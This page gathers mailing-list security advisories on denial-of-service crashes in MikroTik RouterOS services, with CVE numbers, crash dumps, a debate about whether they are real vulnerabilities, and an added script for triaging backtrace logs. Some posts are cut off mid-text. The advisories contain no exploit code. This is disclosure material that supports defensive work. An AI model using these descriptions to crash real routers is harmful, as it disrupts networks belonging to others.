Re: [FD] Three vulnerabilities found in MikroTik's RouterOS
[update 2022/05/30] Two CVEs have been assigned to these vulnerabilities.

CVE-2021-36613: Mikrotik RouterOs before stable 6.48.2 suffers from a memory corruption vulnerability in the ptp process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference).

CVE-2021-36614: Mikrotik RouterOs before stable 6.48.2 suffers from a memory corruption vulnerability in the tr069-client process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference).

Q C wrote on Tue, Jul 6, 2021 at 19:26:

> Advisory: three vulnerabilities found in MikroTik's RouterOS
>
> Details
> ===
>
> Product: MikroTik's RouterOS
> Vendor URL: https://mikrotik.com/
> Vendor Status: fixed version released
> CVE: -
> Credit: Qian Chen(@cq674350529) from Codesafe Team of Legendsec at Qi'anxin Group
>
> Product Description
> ==
>
> RouterOS is the operating system used on MikroTik's devices, such as switch, router and access point.
>
> Description of vulnerabilities
> ==
>
> 1. reachable assertion failure
> The netwatch process suffers from an assertion failure vulnerability. There is a reachable assertion in the netwatch process. By sending a crafted packet, an authenticated remote user can crash the netwatch process due to assertion failure.
>
> Against stable 6.47, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.29-14:27:25.52@0:
> 2020.06.29-14:27:25.52@0:
> 2020.06.29-14:27:25.52@0: /ram/pckg/advanced-tools/nova/bin/netwatch
> 2020.06.29-14:27:25.52@0: --- signal=6
>
> 2020.06.29-14:27:25.52@0:
> 2020.06.29-14:27:25.52@0: eip=0x776b855b eflags=0x0246
> 2020.06.29-14:27:25.52@0: edi=0x esi=0x776c0200 ebp=0x7feea6a0 esp=0x7feea698
> 2020.06.29-14:27:25.52@0: eax=0x ebx=0x00b8 ecx=0x00b8 edx=0x0006
> 2020.06.29-14:27:25.52@0:
> 2020.06.29-14:27:25.52@0: maps:
> 2020.06.29-14:27:25.52@0: 08048000-0804d000 r-xp 00:10 14 /ram/pckg/advanced-tools/nova/bin/netwatch
> 2020.06.29-14:27:25.52@0: 7768a000-776bf000 r-xp 00:0c 966 /lib/libuClibc-0.9.33.2.so
> 2020.06.29-14:27:25.52@0: 776c3000-776dd000 r-xp 00:0c 962 /lib/libgcc_s.so.1
> 2020.06.29-14:27:25.52@0: 776de000-776ed000 r-xp 00:0c 945 /lib/libuc++.so
> 2020.06.29-14:27:25.52@0: 776ee000-7773a000 r-xp 00:0c 947 /lib/libumsg.so
> 2020.06.29-14:27:25.52@0: 7774-77747000 r-xp 00:0c 960 /lib/ld-uClibc-0.9.33.2.so
> 2020.06.29-14:27:25.52@0:
> 2020.06.29-14:27:25.52@0: stack: 0x7feeb000 - 0x7feea698
> 2020.06.29-14:27:25.52@0: 00 00 6c 77 00 00 6c 77 d8 a6 ee 7f 77 40 6b 77 06 00 00 00 00 02 6c 77 20 00 00 00 00 00 00 00
> 2020.06.29-14:27:25.52@0: bc b0 ee 7f 38 a7 ee 7f d4 a6 ee 7f f4 aa 73 77 b8 a6 ee 7f f4 aa 73 77 bc b0 ee 7f ff ff ff ff
> 2020.06.29-14:27:25.52@0:
> 2020.06.29-14:27:25.52@0: code: 0x776b855b
> 2020.06.29-14:27:25.52@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7 d8
>
> This vulnerability was initially found in stable 6.46.2, and it seems that the latest stable version 6.48.3 still suffers from this vulnerability.
>
> 2. NULL pointer dereference
> The tr069-client process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the tr069-client process due to NULL pointer dereference.
>
> Against stable 6.47, the poc resulted in the following crash dump.
>
> # cat /rw/logs/backtrace.log
> 2020.06.10-17:04:17.63@0:
> 2020.06.10-17:04:17.63@0:
> 2020.06.10-17:04:17.63@0: /ram/pckg/tr069-client/nova/bin/tr069-client
> 2020.06.10-17:04:17.63@0: --- signal=11
>
> 2020.06.10-17:04:17.63@0:
> 2020.06.10-17:04:17.63@0: eip=0x0805a185 eflags=0x00010206
> 2020.06.10-17:04:17.63@0: edi=0x7ff74a04 esi=0x7ff74a04 ebp=0x7ff74988 esp=0x7ff7497c
> 2020.06.10-17:04:17.63@0: eax=0x ebx=0x080a9290 ecx=0x776924ec edx=0x7769187c
> 2020.06.10-17:04:17.63@0:
> 2020.06.10-17:04:17.63@0: maps:
> 2020.06.10-17:04:17.63@0: 08048000-08096000 r-xp 00:10 13 /ram/pckg/tr069-client/nova/bin/tr069-client
> 2020.06.10-17:04:17.63@0: 7762f000-77664000 r-xp 00:0c 966 /lib/libuClibc-0.9.33.2.so
> 2020.06.10-17:04:17.63@0: 77668000-77682000 r-xp 00:0c 962 /lib/libgcc_s.so.1
> 2020.06.10-17:04:17.63@0: 77683000-77692000 r-xp 00:0c 945 /lib/libuc++.s
[FD] Three vulnerabilities found in MikroTik's RouterOS
Advisory: three vulnerabilities found in MikroTik's RouterOS

Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: fixed version released
CVE: -
Credit: Qian Chen(@cq674350529) from Codesafe Team of Legendsec at Qi'anxin Group

Product Description
==

RouterOS is the operating system used on MikroTik's devices, such as switch, router and access point.

Description of vulnerabilities
==

1. reachable assertion failure
The netwatch process suffers from an assertion failure vulnerability. There is a reachable assertion in the netwatch process. By sending a crafted packet, an authenticated remote user can crash the netwatch process due to assertion failure.

Against stable 6.47, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.29-14:27:25.52@0:
2020.06.29-14:27:25.52@0:
2020.06.29-14:27:25.52@0: /ram/pckg/advanced-tools/nova/bin/netwatch
2020.06.29-14:27:25.52@0: --- signal=6
2020.06.29-14:27:25.52@0:
2020.06.29-14:27:25.52@0: eip=0x776b855b eflags=0x0246
2020.06.29-14:27:25.52@0: edi=0x esi=0x776c0200 ebp=0x7feea6a0 esp=0x7feea698
2020.06.29-14:27:25.52@0: eax=0x ebx=0x00b8 ecx=0x00b8 edx=0x0006
2020.06.29-14:27:25.52@0:
2020.06.29-14:27:25.52@0: maps:
2020.06.29-14:27:25.52@0: 08048000-0804d000 r-xp 00:10 14 /ram/pckg/advanced-tools/nova/bin/netwatch
2020.06.29-14:27:25.52@0: 7768a000-776bf000 r-xp 00:0c 966 /lib/libuClibc-0.9.33.2.so
2020.06.29-14:27:25.52@0: 776c3000-776dd000 r-xp 00:0c 962 /lib/libgcc_s.so.1
2020.06.29-14:27:25.52@0: 776de000-776ed000 r-xp 00:0c 945 /lib/libuc++.so
2020.06.29-14:27:25.52@0: 776ee000-7773a000 r-xp 00:0c 947 /lib/libumsg.so
2020.06.29-14:27:25.52@0: 7774-77747000 r-xp 00:0c 960 /lib/ld-uClibc-0.9.33.2.so
2020.06.29-14:27:25.52@0:
2020.06.29-14:27:25.52@0: stack: 0x7feeb000 - 0x7feea698
2020.06.29-14:27:25.52@0: 00 00 6c 77 00 00 6c 77 d8 a6 ee 7f 77 40 6b 77 06 00 00 00 00 02 6c 77 20 00 00 00 00 00 00 00
2020.06.29-14:27:25.52@0: bc b0 ee 7f 38 a7 ee 7f d4 a6 ee 7f f4 aa 73 77 b8 a6 ee 7f f4 aa 73 77 bc b0 ee 7f ff ff ff ff
2020.06.29-14:27:25.52@0:
2020.06.29-14:27:25.52@0: code: 0x776b855b
2020.06.29-14:27:25.52@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7 d8

This vulnerability was initially found in stable 6.46.2, and it seems that the latest stable version 6.48.3 still suffers from this vulnerability.

2. NULL pointer dereference
The tr069-client process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the tr069-client process due to NULL pointer dereference.

Against stable 6.47, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.10-17:04:17.63@0:
2020.06.10-17:04:17.63@0:
2020.06.10-17:04:17.63@0: /ram/pckg/tr069-client/nova/bin/tr069-client
2020.06.10-17:04:17.63@0: --- signal=11
2020.06.10-17:04:17.63@0:
2020.06.10-17:04:17.63@0: eip=0x0805a185 eflags=0x00010206
2020.06.10-17:04:17.63@0: edi=0x7ff74a04 esi=0x7ff74a04 ebp=0x7ff74988 esp=0x7ff7497c
2020.06.10-17:04:17.63@0: eax=0x ebx=0x080a9290 ecx=0x776924ec edx=0x7769187c
2020.06.10-17:04:17.63@0:
2020.06.10-17:04:17.63@0: maps:
2020.06.10-17:04:17.63@0: 08048000-08096000 r-xp 00:10 13 /ram/pckg/tr069-client/nova/bin/tr069-client
2020.06.10-17:04:17.63@0: 7762f000-77664000 r-xp 00:0c 966 /lib/libuClibc-0.9.33.2.so
2020.06.10-17:04:17.63@0: 77668000-77682000 r-xp 00:0c 962 /lib/libgcc_s.so.1
2020.06.10-17:04:17.63@0: 77683000-77692000 r-xp 00:0c 945 /lib/libuc++.so
2020.06.10-17:04:17.63@0: 77693000-7769d000 r-xp 00:0c 963 /lib/libm-0.9.33.2.so
2020.06.10-17:04:17.63@0: 7769f000-776bc000 r-xp 00:0c 948 /lib/libucrypto.so
2020.06.10-17:04:17.63@0: 776bd000-776c r-xp 00:0c 954 /lib/libxml.so
2020.06.10-17:04:17.63@0: 776c1000-7770d000 r-xp 00:0c 947 /lib/libumsg.so
2020.06.10-17:04:17.63@0: 7771-7771b000 r-xp 00:0c 955 /lib/libuhttp.so
2020.06.10-17:04:17.63@0: 7771c000-77724000 r-xp 00:0c 951 /lib/libubox.so
2020.06.10-17:04:17.63@0: 77728000-7772f000 r-xp 00:0c 960 /lib/ld-uClibc-0.9.33.2.so
2020.06.10-17:04:17.63@0:
2020.06.10-17:04:17.63@0: stack: 0x7ff75000 - 0x7ff7497c
2020.06.10-17:04:17.63@0: 10 a0 08 08 40 4b 72 77 90 92 0a 08 b8 49 f7 7f 7c fa 71 77 90 92 0a 08 04 4a f7 7f 05 00 00 00
2020.06.10-17:04:17.63@0: 28 4a f7 7f b4 49 f7 7f 40 4b 72 77 88 5b 09 08 40 4b 72 77 80 4d f7 7f 04 4a f7 7f 28 4a f7 7f
2020.06.10-17:04:17.63@0:
[FD] Four vulnerabilities found in MikroTik's RouterOS
Advisory: four vulnerabilities found in MikroTik's RouterOS

Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: only CVE-2020-20227 is fixed
CVE: CVE-2020-20220, CVE-2020-20227, CVE-2020-20245, CVE-2020-20246
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team

Product Description
==

RouterOS is the operating system used on the MikroTik's devices, such as switch, router and access point.

Description of vulnerabilities
==

These vulnerabilities were reported to the vendor almost one year ago. And the vendor confirmed these vulnerabilities.

1. CVE-2020-20220
The bfd process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the bfd process due to invalid memory access.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.19-18:36:13.88@0:
2020.06.19-18:36:13.88@0:
2020.06.19-18:36:13.88@0: /ram/pckg/routing/nova/bin/bfd
2020.06.19-18:36:13.88@0: --- signal=11
2020.06.19-18:36:13.88@0:
2020.06.19-18:36:13.88@0: eip=0x0804b175 eflags=0x00010202
2020.06.19-18:36:13.88@0: edi=0x08054a90 esi=0x08054298 ebp=0x7f9d3e88 esp=0x7f9d3e70
2020.06.19-18:36:13.88@0: eax=0x08050634 ebx=0x7af0 ecx=0x08051274 edx=0x0001
2020.06.19-18:36:13.88@0:
2020.06.19-18:36:13.88@0: maps:
2020.06.19-18:36:13.88@0: 08048000-0805 r-xp 00:1b 16 /ram/pckg/routing/nova/bin/bfd
2020.06.19-18:36:13.88@0: 7759a000-7759c000 r-xp 00:0c 959 /lib/libdl-0.9.33.2.so
2020.06.19-18:36:13.88@0: 7759e000-775d3000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.19-18:36:13.88@0: 775d7000-775f1000 r-xp 00:0c 960 /lib/libgcc_s.so.1
2020.06.19-18:36:13.88@0: 775f2000-77601000 r-xp 00:0c 944 /lib/libuc++.so
2020.06.19-18:36:13.88@0: 77602000-7775f000 r-xp 00:0c 954 /lib/libcrypto.so.1.0.0
2020.06.19-18:36:13.88@0: 7776f000-7000 r-xp 00:0c 950 /lib/libubox.so
2020.06.19-18:36:13.88@0: 8000-777c4000 r-xp 00:0c 946 /lib/libumsg.so
2020.06.19-18:36:13.88@0: 777ca000-777d1000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.19-18:36:13.88@0:
2020.06.19-18:36:13.88@0: stack: 0x7f9d4000 - 0x7f9d3e70
2020.06.19-18:36:13.88@0: 34 06 05 08 d0 e6 04 08 d8 3e 9d 7f 90 4a 05 08 98 42 05 08 d8 3e 9d 7f f8 3e 9d 7f 6d 39 77 77
2020.06.19-18:36:13.88@0: 90 4a 05 08 28 40 9d 7f 05 00 00 00 00 43 05 08 00 00 00 00 28 90 7c 77 01 00 00 00 0c 00 00 00
2020.06.19-18:36:13.88@0:
2020.06.19-18:36:13.88@0: code: 0x804b175
2020.06.19-18:36:13.88@0: ff 05 00 00 00 00 83 c4 10 c9 c3 55 89 e5 53 83

This vulnerability was initially found in long-term 6.44.6, and it seems that the latest stable version 6.48.2 still suffers from this vulnerability.

2. CVE-2020-20227
The diskd process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the diskd process due to invalid memory access.

Against stable 6.47, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.05-15:00:38.33@0:
2020.06.05-15:00:38.33@0:
2020.06.05-15:00:38.33@0: /nova/bin/diskd
2020.06.05-15:00:38.33@0: --- signal=11
2020.06.05-15:00:38.33@0:
2020.06.05-15:00:38.33@0: eip=0x7775a1e3 eflags=0x00010202
2020.06.05-15:00:38.33@0: edi=0x7f9dd024 esi=0x000a ebp=0x7f9dceb8 esp=0x7f9dceac
2020.06.05-15:00:38.33@0: eax=0x000a ebx=0x777624ec ecx=0x08054600 edx=0x08056e18
2020.06.05-15:00:38.33@0:
2020.06.05-15:00:38.33@0: maps:
2020.06.05-15:00:38.33@0: 08048000-08052000 r-xp 00:0c 1049 /nova/bin/diskd
2020.06.05-15:00:38.33@0: 776ff000-77734000 r-xp 00:0c 966 /lib/libuClibc-0.9.33.2.so
2020.06.05-15:00:38.33@0: 77738000-77752000 r-xp 00:0c 962 /lib/libgcc_s.so.1
2020.06.05-15:00:38.33@0: 77753000-77762000 r-xp 00:0c 945 /lib/libuc++.so
2020.06.05-15:00:38.33@0: 77763000-7776b000 r-xp 00:0c 951 /lib/libubox.so
2020.06.05-15:00:38.33@0: 7776c000-777b8000 r-xp 00:0c 947 /lib/libumsg.so
2020.06.05-15:00:38.33@0: 777be000-777c5000 r-xp 00:0c 960 /lib/ld-uClibc-0.9.33.2.so
2020.06.05-15:00:38.33@0:
2020.06.05-15:00:38.33@0: stack: 0x7f9de000 - 0x7f9dceac
2020.06.05-15:00:38.33@0: f4 8a 7b 77 0a 00 00 00 f4 8a 7b 77 e8 ce 9d 7f 92 be 78 77 f8 45 05 08 0a 00 00 00 18 6e 05 08
2020.06.05-15:00:38.33@0: 18 6e 05 08 e4 ce 9d 7f 24 d0 9d 7f 7c 18 76 77 24 d0 9d 7f 18 69 05 08 40 cf 9d 7f a8 cf 9d 7f
2020.06.05-15:00:38.34@0:
2020.06.05-15:00:38.34@0: code: 0x7775a1e3
2020.06.05-15:00:38.34@0: 8b 00 8b 10 01 c2 83 c2 04 52 83 c0 04
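Every advisory in this thread ends in the same artifact, a RouterOS /rw/logs/backtrace.log dump, and the first triage question is always the same: did eip land in the process's own code or inside a shared library? The script below is an added example for this page (it is not part of the advisories, of RouterOS, or of any MikroTik tooling). It strips the timestamp prefix, reads the process path, the "--- signal=N" line and the register lines, parses the "maps:" section, and resolves eip to the containing module and offset. The two embedded excerpts are trimmed from the netwatch dump in the first advisory and the diskd dump just above; the signal table and the handling of register values that the list archive rendered as a bare "0x" are the example's own choices.

```python
import re
from dataclasses import dataclass, field

# Signal numbers as they appear in the "--- signal=N" lines (x86 Linux).
SIGNAL_NAMES = {6: "SIGABRT", 8: "SIGFPE", 11: "SIGSEGV"}

# Two excerpts trimmed from dumps posted in this thread (netwatch from the
# first advisory, diskd from CVE-2020-20227 above). Timestamp prefixes are
# kept; stack and code sections are dropped. Register values the list
# archive rendered as a bare "0x" are left exactly as they appear there.
NETWATCH_DUMP = """\
2020.06.29-14:27:25.52@0: /ram/pckg/advanced-tools/nova/bin/netwatch
2020.06.29-14:27:25.52@0: --- signal=6
2020.06.29-14:27:25.52@0: eip=0x776b855b eflags=0x0246
2020.06.29-14:27:25.52@0: edi=0x esi=0x776c0200 ebp=0x7feea6a0 esp=0x7feea698
2020.06.29-14:27:25.52@0: maps:
2020.06.29-14:27:25.52@0: 08048000-0804d000 r-xp 00:10 14 /ram/pckg/advanced-tools/nova/bin/netwatch
2020.06.29-14:27:25.52@0: 7768a000-776bf000 r-xp 00:0c 966 /lib/libuClibc-0.9.33.2.so
2020.06.29-14:27:25.52@0: 776de000-776ed000 r-xp 00:0c 945 /lib/libuc++.so
"""

DISKD_DUMP = """\
2020.06.05-15:00:38.33@0: /nova/bin/diskd
2020.06.05-15:00:38.33@0: --- signal=11
2020.06.05-15:00:38.33@0: eip=0x7775a1e3 eflags=0x00010202
2020.06.05-15:00:38.33@0: eax=0x000a ebx=0x777624ec ecx=0x08054600 edx=0x08056e18
2020.06.05-15:00:38.33@0: maps:
2020.06.05-15:00:38.33@0: 08048000-08052000 r-xp 00:0c 1049 /nova/bin/diskd
2020.06.05-15:00:38.33@0: 776ff000-77734000 r-xp 00:0c 966 /lib/libuClibc-0.9.33.2.so
2020.06.05-15:00:38.33@0: 77753000-77762000 r-xp 00:0c 945 /lib/libuc++.so
"""

PREFIX_RE = re.compile(r"^\d{4}\.\d{2}\.\d{2}-\d{2}:\d{2}:\d{2}\.\d{2}@\d+:\s?")
MAP_RE = re.compile(r"^([0-9a-f]+)-([0-9a-f]+)\s+(\S+)\s+\S+\s+\d+\s+(\S+)$")
REG_RE = re.compile(r"([a-z]+)=0x([0-9a-f]*)")


@dataclass
class Mapping:
    start: int
    end: int
    perms: str
    path: str


@dataclass
class Crash:
    process: str = ""
    signal: int = 0
    regs: dict = field(default_factory=dict)
    maps: list = field(default_factory=list)

    def module_for(self, addr):
        """Return (path, offset) of the mapping that contains addr, or None."""
        for m in self.maps:
            if m.start <= addr < m.end:
                return m.path, addr - m.start
        return None


def parse_backtrace(text):
    """Parse one backtrace.log dump into a Crash record."""
    crash = Crash()
    in_maps = False
    for raw in text.splitlines():
        line = PREFIX_RE.sub("", raw).strip()
        if not line:
            continue
        if line.startswith("--- signal="):
            crash.signal = int(line.split("=", 1)[1])
        elif line == "maps:":
            in_maps = True
        elif in_maps and (m := MAP_RE.match(line)):
            crash.maps.append(Mapping(int(m[1], 16), int(m[2], 16), m[3], m[4]))
        elif "=0x" in line:
            for name, val in REG_RE.findall(line):
                # A bare "0x" means the value did not survive the archive;
                # record None rather than guessing zero.
                crash.regs[name] = int(val, 16) if val else None
        elif not crash.process and line.startswith("/"):
            crash.process = line
    return crash


def triage(text):
    """Summarise where the process died: signal, module and offset of eip."""
    crash = parse_backtrace(text)
    eip = crash.regs.get("eip")
    hit = crash.module_for(eip) if eip is not None else None
    return {
        "process": crash.process,
        "signal": SIGNAL_NAMES.get(crash.signal, str(crash.signal)),
        "eip": eip,
        "module": hit[0] if hit else None,
        "offset": hit[1] if hit else None,
        # eip in the main binary points at first-party code; eip inside a
        # library (the C library for a SIGABRT) means the caller is the frame
        # worth looking at, and it has to be recovered from the stack words.
        "in_main_binary": bool(hit) and hit[0] == crash.process,
    }


if __name__ == "__main__":
    for dump in (NETWATCH_DUMP, DISKD_DUMP):
        print(triage(dump))
```

On these two excerpts the netwatch SIGABRT resolves to /lib/libuClibc-0.9.33.2.so at offset 0x2e55b and the diskd SIGSEGV to /lib/libuc++.so at offset 0x71e3, so neither eip is in the process's own text. The same libuClibc offset, 0x2e55b, falls out of the btest dump (eip 0x7772255b, base 0x776f4000) and the user dump (eip 0x7765a55b, base 0x7762c000) later in the thread, and all three carry identical code bytes at eip, which is what you would expect for assertion failures that end in the C library's abort path: eip identifies the library, not the bug, and the caller has to be read back from the stack.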
Re: [FD] Three vulnerabilities found in MikroTik's RouterOS
Hi,

In Mikrotik RouterOs, each user is assigned to a user group, which denotes the rights of this user. A group policy is a combination of individual policy items, and provides a convenient way to assign different permissions and access rights to different user classes. (Reference: https://help.mikrotik.com/docs/display/ROS/User)

Some common individual policy items are: web, winbox, read, write, reboot and so on. Among them, reboot is treated as a separate permission. So an authenticated user may not have the permission to reboot the device.

As to these vulnerabilities (or software bugs?), reboot permission is not required to trigger them. And they may pose an impact on the system services or even reboot the system. Of course, since authentication is still necessary to trigger them, they have a low impact.

Thanks!

Gynvael Coldwind wrote on Sat, May 8, 2021 at 12:09 AM:

> Hi,
>
> I might be missing something, but how are these considered vulnerabilities?
> My point is that these require authentication, and an already authenticated user already has permissions to reboot the device anyway, right?
>
> If the above assumption is correct, then there isn't really a security boundary breach, so it would be a software bug, but not a vulnerability.
> Or am I missing something?
>
> Thanks,
> Gynvael
>
> On Fri, May 7, 2021 at 5:51 PM Q C wrote:
>
>> [update 2021/05/04] Three CVEs have been assigned to these vulnerabilities.
>>
>> CVE-2020-20215: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/diskd process. An authenticated remote attacker can cause a Denial of Service due to invalid memory access.
>>
>> CVE-2020-20216: Mikrotik RouterOs 6.44.6 (long-term tree) suffers from a memory corruption vulnerability in the /nova/bin/graphing process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference)
>>
>> CVE-2020-20213: Mikrotik RouterOs 6.44.5 (long-term tree) suffers from a stack exhaustion vulnerability in the /nova/bin/net process. An authenticated remote attacker can cause a Denial of Service due to overloading the system's CPU
>>
>>
>>
>> Q C wrote on Wed, Jul 22, 2020 at 8:11 PM:
>>
>> > Advisory: three vulnerabilities found in MikroTik's RouterOS
>> >
>> >
>> > Details
>> > ===
>> >
>> > Product: MikroTik's RouterOS
>> > Vendor URL: https://mikrotik.com/
>> > Vendor Status: fixed version released
>> > CVE: -
>> > Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team
>> >
>> >
>> > Product Description
>> > ==
>> >
>> > RouterOS is the operating system used on the MikroTik's devices, such as switch, router and access point.
>> >
>> >
>> > Description of vulnerabilities
>> > ==
>> >
>> > 1. Memory corruption vulnerability
>> > The diskd process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the diskd process due to invalid memory access.
>> >
>> > Against stable 6.44.3, the poc resulted in the following crash dump.
>> >
>> > # cat /rw/logs/backtrace.log
>> > 2020.06.04-14:18:22.55@0:
>> > 2020.06.04-14:18:22.55@0:
>> > 2020.06.04-14:18:22.55@0: /nova/bin/diskd
>> > 2020.06.04-14:18:22.55@0: --- signal=11
>> >
>> > 2020.06.04-14:18:22.55@0:
>> > 2020.06.04-14:18:22.55@0: eip=0x776cd1db eflags=0x00010202
>> > 2020.06.04-14:18:22.55@0: edi=0x08056760 esi=0x08056790 ebp=0x7fd40b78 esp=0x7fd40b6c
>> > 2020.06.04-14:18:22.55@0: eax=0x001b ebx=0x776d54ec ecx=0x776d54ec edx=0x20fe0010
>> > 2020.06.04-14:18:22.55@0:
>> > 2020.06.04-14:18:22.55@0: maps:
>> > 2020.06.04-14:18:22.55@0: 08048000-08052000 r-xp 00:0c 1131 /nova/bin/diskd
>> > 2020.06.04-14:18:22.55@0: 77672000-776a7000 r-xp 00:0c 996 /lib/libuClibc-0.9.33.2.so
>> > 2020.06.04-14:18:22.55@0: 776ab000-776c5000 r-xp 00:0c 992 /lib/libgcc_s.so.1
>> > 2020.06.04-14:18:22.55@0: 776c6000-776d5000 r-xp 00:0c 976 /lib/libuc++.so
>> > 2020.06.04-14:18:22.55@0: 776d6000-776de000 r-xp 00:0c 982 /lib/libubox.so
>> > 2020.06.04-14:18:2
[FD] Four vulnerabilities found in MikroTik's RouterOS
Advisory: four vulnerabilities found in MikroTik's RouterOS

Details
===

Product: MikroTik's RouterOS
Vendor URL: https://mikrotik.com/
Vendor Status: no fix yet
CVE: CVE-2020-20214, CVE-2020-20222, CVE-2020-20236, CVE-2020-20237
Credit: Qian Chen(@cq674350529) of Qihoo 360 Nirvan Team

Product Description
==

RouterOS is the operating system used on the MikroTik's devices, such as switch, router and access point.

Description of vulnerabilities
==

These vulnerabilities were reported to the vendor almost one year ago. And the vendor confirmed these vulnerabilities. However, there is still no fix for them yet.

By the way, the three vulnerabilities in the sniffer binary are different from each other.

1. CVE-2020-20214
The btest process suffers from an assertion failure vulnerability. There is a reachable assertion in the btest process. By sending a crafted packet, an authenticated remote user can crash the btest process due to assertion failure.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.19-15:51:36.94@0:
2020.06.19-15:51:36.94@0:
2020.06.19-15:51:36.94@0: /nova/bin/btest
2020.06.19-15:51:36.94@0: --- signal=6
2020.06.19-15:51:36.94@0:
2020.06.19-15:51:36.94@0: eip=0x7772255b eflags=0x0246
2020.06.19-15:51:36.94@0: edi=0x00fe0001 esi=0x7772a200 ebp=0x7fdcf880 esp=0x7fdcf878
2020.06.19-15:51:36.94@0: eax=0x ebx=0x010f ecx=0x010f edx=0x0006
2020.06.19-15:51:36.94@0:
2020.06.19-15:51:36.94@0: maps:
2020.06.19-15:51:36.94@0: 08048000-08057000 r-xp 00:0c 1006 /nova/bin/btest
2020.06.19-15:51:36.94@0: 776f4000-77729000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.19-15:51:36.94@0: 7772d000-77747000 r-xp 00:0c 960 /lib/libgcc_s.so.1
2020.06.19-15:51:36.94@0: 77748000-77757000 r-xp 00:0c 944 /lib/libuc++.so
2020.06.19-15:51:36.94@0: 77758000-5000 r-xp 00:0c 947 /lib/libucrypto.so
2020.06.19-15:51:36.94@0: 6000-777c2000 r-xp 00:0c 946 /lib/libumsg.so
2020.06.19-15:51:36.94@0: 777c8000-777cf000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.19-15:51:36.94@0:
2020.06.19-15:51:36.94@0: stack: 0x7fdd - 0x7fdcf878
2020.06.19-15:51:36.94@0: 00 a0 72 77 00 a0 72 77 b8 f8 dc 7f 77 e0 71 77 06 00 00 00 00 a2 72 77 20 00 00 00 00 00 00 00
2020.06.19-15:51:36.94@0: 16 00 00 00 18 f9 dc 7f b4 f8 dc 7f e4 2a 7c 77 01 00 00 00 e4 2a 7c 77 16 00 00 00 01 00 fe 00
2020.06.19-15:51:36.94@0:
2020.06.19-15:51:36.94@0: code: 0x7772255b
2020.06.19-15:51:36.94@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7 d8

This vulnerability was initially found in long-term 6.44.5, and it seems that the latest stable version 6.48.2 still suffers from this vulnerability.

2. CVE-2020-20222
The sniffer process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the sniffer process due to NULL pointer dereference.

Against stable 6.46.5, the poc resulted in the following crash dump.

# cat /rw/logs/backtrace.log
2020.06.19-16:36:18.33@0:
2020.06.19-16:36:18.33@0:
2020.06.19-16:36:18.33@0: /nova/bin/sniffer
2020.06.19-16:36:18.33@0: --- signal=11
2020.06.19-16:36:18.33@0:
2020.06.19-16:36:18.33@0: eip=0x08050e33 eflags=0x00010206
2020.06.19-16:36:18.33@0: edi=0x08057a24 esi=0x7f85c094 ebp=0x7f85c0c8 esp=0x7f85c080
2020.06.19-16:36:18.33@0: eax=0x ebx=0x7f85c090 ecx=0x00ff edx=0x08059678
2020.06.19-16:36:18.33@0:
2020.06.19-16:36:18.33@0: maps:
2020.06.19-16:36:18.33@0: 08048000-08056000 r-xp 00:0c 1034 /nova/bin/sniffer
2020.06.19-16:36:18.33@0: 776ce000-77703000 r-xp 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.19-16:36:18.33@0: 77707000-77721000 r-xp 00:0c 960 /lib/libgcc_s.so.1
2020.06.19-16:36:18.33@0: 77722000-77731000 r-xp 00:0c 944 /lib/libuc++.so
2020.06.19-16:36:18.33@0: 77732000-7773a000 r-xp 00:0c 950 /lib/libubox.so
2020.06.19-16:36:18.33@0: 7773b000-77787000 r-xp 00:0c 946 /lib/libumsg.so
2020.06.19-16:36:18.33@0: 7778d000-77794000 r-xp 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.19-16:36:18.33@0:
2020.06.19-16:36:18.33@0: stack: 0x7f85d000 - 0x7f85c080
2020.06.19-16:36:18.33@0: 2c 08 07 08 04 00 fe 08 fe 00 00 00 20 ad 05 08 00 0c 07 08 a0 0b 07 08 af 0b 07 08 04 7a 05 08
2020.06.19-16:36:18.33@0: 08 00 00 00 24 7a 05 08 ff 00 00 00 00 00 00 00 08 c2 85 7f e4 7a 78 77 d8 c0 85 7f e4 7a 78 77
2020.06.19-16:36:18.34@0:
2020.06.19-16:36:18.34@0: code: 0x8050e33
2020.06.19-16:36:18.34@0: 0b 48 0c 89 fa 89 d8 e8 7d f1 ff ff 50 50 53 56

This vulnerability was initially
Re: [FD] Four vulnerabilities found in MikroTik's RouterOS
[Update 2021/05/05] Two CVEs have been assigned to two of these vulnerabilities.

CVE-2020-20254: Mikrotik RouterOs before 6.47 (stable tree) suffers from a memory corruption vulnerability in the /nova/bin/lcdstat process. An authenticated remote attacker can cause a Denial of Service (NULL pointer dereference).

CVE-2020-20253: Mikrotik RouterOs before 6.47 (stable tree) suffers from a vulnerability in the /nova/bin/lcdstat process. An authenticated remote attacker can cause a Denial of Service due to a divide by zero error.

